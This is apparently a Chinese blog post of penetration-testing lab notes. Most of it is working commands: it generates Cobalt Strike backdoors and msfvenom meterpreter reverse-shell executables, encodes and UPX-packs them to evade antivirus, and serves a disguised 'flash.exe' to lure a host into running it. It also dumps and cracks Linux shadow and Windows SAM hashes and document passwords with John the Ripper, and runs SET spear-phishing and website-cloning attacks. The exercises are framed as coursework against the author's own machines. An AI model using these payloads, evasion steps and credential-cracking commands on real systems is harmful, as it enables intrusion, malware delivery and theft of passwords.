网络攻击与防御

本文详细介绍了如何使用CobaltStrike进行基本操作、生成和利用攻击后门,以及通过网络共享和免杀处理诱导目标主机下载payload。同时,提到了利用Msfvenom生成木马和进行监听的方法。此外,还涉及了Windows提权技巧和利用SET工具进行钓鱼邮件和网站的社会工程学攻击。
摘要由CSDN通过智能技术生成

目录

一、

基本操作

二、

安装并基本学习使用CobaltStrike

三、

1利用Cobaltstrike生成攻击后门,通过两种网络共享下载该后门,运行后门后上线

四、

利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听

五、

通过网页共享的方式,诱导目标主机下载payload病毒软件,从而获得目标控制权。

六、

利用python命令实现以网页共享的方式,诱导目标主机下载payload病毒软件,从而获得目标控制权。

七、

对payload文件进行编码操作

八、

了解Windows提权的常见方法

2.使用Windows的相关命令,查询并获取目标系统中的相关信息。

九、

在Cobaltstrike中安装Ladon插件,并利用该插件进行常规的渗透测试与信息收集

十、Johnny

分别使用John the Ripper和Johnny破解Linux系统密码;

请参考The Social-Engineer Toolkit全模块讲解https://www.freebuf.com/sectool/339350.html,利用SET进行钓鱼邮件、钓鱼网站等社工攻击。

!!!知识点




一、

基本操作

  1. kali网路适配器选择桥接模式
  2. 主机命令提示符用ipconfig -all 查询主机ip地址等信息(看WLAN那一模块)【截图放试卷】
  3. 主机关闭实时保护(windows安全中心->病毒和威胁保护->”病毒和威胁防护”设置->关闭实时保护)
  4. 用powershell关闭防火墙(搜索powershell->以管理员身份运行->netsh advfirewall set allprofiles state off
  5. 打开kali,用ifconfig查询kali机ip地址等信息

 

需要设置

  1.方法为手动

2.ip,在本机ip的基础上,在最后三个数字的基础上加57,组成kali的ip地址

3.子网掩码和网关(根据在kali机查询到的信息填写)

4.DNS服务器(和网关相同)

  1. 保存后重启kali
  2. 在主机命令提示符ping kali机IP地址(要ping通)
  3. 在kali机ping主机ip地址(要ping通)

【出现问题可能是ip设置错误或防火墙问题(用powershell修改状态)】

若出现问题,修改防火墙状态

打开powershell,以管理员身份运行,查看版本

$psversiontable

更改执行策略并查看

set-executionpolicy unrestricted

get-executionpolicy

  • 二、

  • 安装并基本学习使用CobaltStrike

(1)在主机,解压cobaltstrike,将解压后的文件拖入kali机

(2)打开终端以root身份登录,切换到cs所在文件夹

输入 chmod 777 -R ./*

 (3)输入 ./teamserver ip地址+密码,成功后保持打开状态(这里看端口号)

 (4)打开另一个终端,切换到cs所在文件夹

输入./cobaltstrike

  1. 打开后修改主机,端口号,密码

  • 获得本机控制权

(1)进入cs后,点击_cobalt strike,选择监听器,添加

(2)攻击->生成后门->payload生成器->选择添加的监听器,类型选择powershell

(3)生成后保存在home文件夹,在文件系统中找到home,找到payload文件,将其复制到主机桌面

(4)打开powershell,以管理员身份运行

(5).\切换到C盘

(6)./payload.ps1 运行程序

(7)再次打开cs,显示控制成功

三、

1利用Cobaltstrike生成攻击后门,通过两种网络共享下载该后门,运行后门后上线

  1. 在本机

 生成后门见获得本机控制权

(1.1)命令提示符切换目录至cs所在文件夹,利用python开启简易http服务

(1.2)python -m http.server 4321

(1.3)在浏览器输入本机ip地址+ :4321,可看到cs4.5文件夹里内容

(2.1)在kali机打开/var/www/html/,找到index.html,将其复制到主机cs4.5所在文件夹

(2.2)再次在浏览器输入本机ip地址+ :4321

  1. 在kali机

(1.1)在kali切换目录至cs所在文件夹,利用python开启简易http服务

(1.2)python -m http.server 5432

(1.3)在本机浏览器和kali机浏览器输入kali机ip地址+ :5432,都能显示文件夹信息

(2.1)vim /etc/apache2/ports.conf 将端口号改为8080

(2.2)service apache2 start

(2.3)在kali浏览器输入kali机ip地址+ :80,显示成功

2利用Cobaltstrike生成攻击后门,通过“文件托管”进行网络共享下载该后门,运行后门后上线

(1)打开cs,查看监听器

(2)攻击->生成后门->windows可执行文件,生成一个文件

(3)攻击->web钓鱼->文件托管

 

  1. 生成链接,将其复制到主机浏览器下载到桌面,将后缀修改为exe,双击执行成功

四、

  1. 利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听

(1)打开漏洞利用工具集metaspolit framework

  1. 输入密码进入matasploit

(3)命令行msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.121 lport=5656 -f exe -o wsr.exe 生成主机Ip为192.168.43.121和端口号为5656的命名为wsr的exe文件

(4)找到exe文件(一般在home文件夹里),将其拖入主机桌面

(5)输入命令行运用应用

use exploit/multi/handler

  1. 查看需要设置的主机Ip和端口号

options

  1. 输入命令行,定义lhost和lport,并run执行

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.43.212

set lport 5656

run

  1. 在win桌面双击启动wsr.exe文件,获得权限

  1. 利用建立的监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等)

ls查看桌面信息

run vnc 在kali里看到主机桌面

再次进入meterpreter,screenshot截图

getwd 输出工作目录

 

  • 五、

  • 通过网页共享的方式,诱导目标主机下载payload病毒软件,从而获得目标控制权。

命令行msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.121 lport=5656 -f exe -o flash.exe 生成主机Ip为192.168.43.121和端口号为5656的命名为flash的exe文件

输入命令行运用应用,定义lhost和lport,并run执行

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.43.212

set lport 5656

run

开启apache2服务

将生成的flash.exe文件用cp命令复制到html文件夹里

进入html文件夹,将原本的index.html文件移除

将新的index.html文件用cp命令从wsr文件夹复制到html文件夹,发现没有权限

chmod 777 index.html获得权限,再次复制

在主机浏览器打开kali的ip地址下所存在的网页,用网页共享的方式诱导目标机下载flash.exe病毒软件

下载后双击运行,获取主机权限

  • 六、

  • 利用python命令实现以网页共享的方式,诱导目标主机下载payload病毒软件,从而获得目标控制权。

查看本机是否有python环境,在命令提示符输入python

在kali中切换到html文件夹,利用python命令开启网页共享服务

python -m http.server 789

在主机浏览器打开kali的ip地址下所存在的网页,用网页共享的方式诱导目标机下载flash.exe病毒软件

下载后双击运行,获取主机权限

七、

  1. 对payload文件进行编码操作

打开msfconsole

输入命令查看当前所有编码器,选择最优

msfvenom -l encoders 选择excellent的那个

 

生成payload文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.212 lport=9090 -f exe -o wsr.exe

生成一重编译20次的payload软件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.212 lport=9090 -e x86/shikata_ga_nai -i 20 -f exe wsr1.exe

生成多重编码的payload文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.212 lport=9090 -e x86/shikata_ga_nai -i 20 -f row |msfvenom -a x86 --platform windows -e x85/countdown -i 10 -f raw -f exe -o wsr2.exe

将生成的三个病毒文件移入win系统,关闭实时保护

开始攻击

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.43.212

set lport 5656

run

双击wsr文件,获得控制权后退出

 

双击wsr1文件,获得控制权后退出

双击wsr2文件,获得控制权后退出

打开实时保护,三个文件都无法成功操作

2.对payload文件加壳

upx查看加壳工具的具体参数

对wsr文件进行加壳,文件大小变小了,压缩率为65.21%

upx -9 -q -o wsr4.exe wsr.exe

将文件拖入主机,开始攻击,可以获得主机控制权

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.43.212

set lport 5656

run

开启实时保护,仍可以获得主机控制权

八、

  1. 了解Windows提权的常见方法

2.使用Windows的相关命令,查询并获取目标系统中的相关信息。

 

 

 

 

 

 

 

 

 

 

 

 

九、

  1. 在Cobaltstrike中安装Ladon插件,并利用该插件进行常规的渗透测试与信息收集

打开cs4.5

 

 

生成windows可执行程序,并将其复制到windows系统

双击运行

获得控制权

右键,尝试获取密码

  1. 使用Ladon渗透测试工具进行内网渗透测试,并利用其相关功能辅助渗透攻击

将文件夹拖入c盘,打开ladon

点击powershell混淆,点击powershell->exe

显示isok

在c盘生成一个文件,打开如图

十、Johnny

  1. 分别使用John the Ripper和Johnny破解Linux系统密码;

使用john the Ripper

切换到~文件夹,先生成两个用户及各自的密码

cd ~

useradd test

useradd test1

 

合并passwd和shadow文件

unshadow /etc/passwd /etc/shadow >shadow.txt

破解密码并show

john -format=crypt shadow.txt

john -format=crypt shadow.txt --show

  1. 分别使用John the Ripper和Johnny破解Windows系统密码

reg save hklm\sam sam

reg save hklm\system system

 

将文件拖入kali

samdump2 system sam >win.txt 合并两文件

john --format=NT win.txt

john --format=NT win.txt --show

  • 分别使用John the Ripper和Johnny破解word、Excel、rar、zip、pdf文档密码

解压缩rocyou.txt.gz文件

cd /usr/share/john

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

wc -l /usr/share/wordlists/rockyou.txt

利用/usr/sbin/unshadow执行文件来转换passwd和shadow文件

/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt ~/passwords.txt

查看目录下不同的转换工具

locate *2john

破解word文档密码

python office2john.py 1.docx >hash.txt

office2john 1.docx>hash.txt

john --wordlist=/usr/share/worldlists/rockyou.txt hash.txt

 

破解xlsx文件密码,因密码太复杂无法破解

python office2john.py 2.xlsx >hash.txt

office2john 2.xlsx>hash.txt

john --wordlist=/usr/share/worldlists/rockyou.txt hash.txt

破解rar文件密码

rar2john 3.rar >hash.txt

john --wordlist=/usr/share/worldlists/rockyou.txt hash.txt

破解zip文件密码

cd /usr/sbin

zip2john 1.zip >hashzip.txt

john hashzip.txt

 

破解pdf文件密码

locate pdf2john

cd /usr/share/john

./pdf2john.pl 5.pdf >hashpdf.txt

john hashpdf.txt

  • 请参考The Social-Engineer Toolkit全模块讲解https://www.freebuf.com/sectool/339350.html,利用SET进行钓鱼邮件、钓鱼网站等社工攻击。

1.利用SET进行钓鱼邮件

在目录下打开社会工程学工具

用root权限进入后,选择1,社会工程攻击

选择1,鱼叉式网络钓鱼攻击载体

选择1,电子邮件攻击

使用DDL劫持攻击

选择攻击载荷

选择回连载荷

选择文件类型

设置邮箱,开始攻击

 

邮件发送成功,点击即可获取控制权

2.钓鱼网站攻击

在目录下打开社会工程学工具

打开学校官网

在菜单栏中选择社会工程攻击选项1

选择网络攻击选项2

选择网络劫持攻击方法选项5

选择网站克隆选项2

输入IP地址及想要克隆的网站

 

在win浏览器输入ip地址,网站获取成功

kali监听信息

!!!知识点

 

 

 

 

冒充管理员,骗取用户信任,并借此获取口令的攻击方式被称为密码猜测攻击

sudo为普通用户以root用户执行,cs是一个服务端,多个客户端

attrib是修改文件属性,modify是改文件夹,dir是查看文件夹

john the ripper:linux/win/execl口令

kali:渗透测试,口令破解,社会工程学(passwd、shadow(security、sysyem)用户及密码)

namp:漏洞扫描、端口扫描、操作系统扫描

chomd777/chomd771,metaspolit:expolit、payload、encoder

set适用于钓鱼和社工,网卡不能设置为交换和随机去暴露ip

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值